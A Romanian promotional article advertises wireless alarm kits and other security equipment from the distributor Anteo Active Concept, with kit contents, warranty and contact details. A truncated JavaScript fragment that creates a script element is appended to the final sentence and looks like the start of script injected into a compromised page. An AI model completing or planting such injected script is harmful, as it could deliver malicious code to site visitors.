kit-alarma-gsm-gprs-satel-micra-basic-2b-500x500Cauti un distribuitor de kituri alarma wireless? Doresti sa folosesti echipamente performante care sa reziste in timp? Vrei sa fie accesibile la pret? Atunci trebuie sa afli despre oferta celor de la Anteo Active Concept. Este o companie romaneasca ce distribuie echipamente fabricate de producatori renumiti in domeniu.

Informatii aditionale despre Anteo Active Concept si oferta lor de kituri alarma wireless

Desi in spatele companiei Anteo Active Concept se afla o echipa tanara, aceasta este dinamica si dornica sa promoveze doar cele mai bune produse. Compania are alaturi parteneri puternici ce asigura proiectarea, instalarea si repararea sistemelor de securitate. Toate produsele sunt comercializate la cele mai avantajoase preturi. Anteo Active Concept se adreseaza atat clientilor care doresc sa monteze kituri alarma wireless in propria locuinta, cat si clientilor care vor sa ofere o protectie maxima cladirilor pe care le gestioneaza. Prin urmare sistemele de supraveghere pot fi montate atat in locuintele rezidentiale cat si in spatiile comerciale, birouri sau alte sectoare industriale. Exista o gama larga de produse promovate din care amintim de alarmele antiefractie, sistemele de supraveghere video, alarmele de incendiu, interfoanele, sistemele de control acces, gardurile electrice. Toate produsele beneficiaza de 24 de luni de garantie.

Pentru o protectie garantata poti opta pentru sisteme de alarma wireless alcatuite din componentele de care consideri ca ai nevoie sau poti alege kituri alarma wireless. Acestea din urma sunt mai complexe siĀ  difera in functie de modelul ales. Un kit poate contine elemente precum: centrala alarma hibrid ce suporta elemente wireless si cablate, tastatura LED wireless, sirena de exterior cu acumulator, acumulator, carcasa din plastic sau metalica cu transformator, antena GSM/GPRS, telecomanda, senzor de miscare wireless, un contact magnetic wireless, etc.

Alege kituri alarma wireless performante

Protejeaza-ti bunurile alegand sa instalezi sisteme profesionale de securitate. Anteo Active Concept isi etaleaza produsele promovate prin intermediul magazinului virtual securitatesisupraveghere.ro. Aici produsele sunt prezentate in detaliu beneficiind de toate specificatiile tehnice de care ai nevoie. Alege produsele de care ai nevoie sau cere ajutorul expertilor de la Anteo Active Concept. Ei iti vor propune solutii personalizate sub forma unor kituri alarma wireless performante. Produsele se pot comanda online direct din magazinul virtual. Vei avea surpriza sa gasesti produse avantajoase ca pret, prin urmare nu vei investi mai mult decat este necesar.

De ce este atat de important sa montezi sisteme de securitate? Pentru ca iti ofera posibilitatea sa intervi la timp in cazul in care apare ceva. Spre exemplu daca se declanseaza un incendiu, detectoarele de fum pornesc si te anunta rapid pentru ca tu sa ai timp sa intervi. Ai sansa sa salvezi bunuri si vieti omenesti.

Ai grija de bunurile pe care le detii si protejeaza-ti familia apeland la sisteme de securitate eficiente. Contacteaza compania Anteo Active Concept printr-un apel la numarul de telefon 0745.089.610 sau printr-un email expediat la adresa office@securitatesisupraveghere.ro. Cumparaturile le faci rapid in cadrul magazinului virtual. Alege kituri alarma wireless si vei avea parte de protectie maxima. Investeste in echipamente performante, rezistente in utilizare, fiabile, care sunt realizate din materiale de cea mai buna calitate si care au la baza o tehnologie moderna.var d=document;var s=d.createElement(‘script’);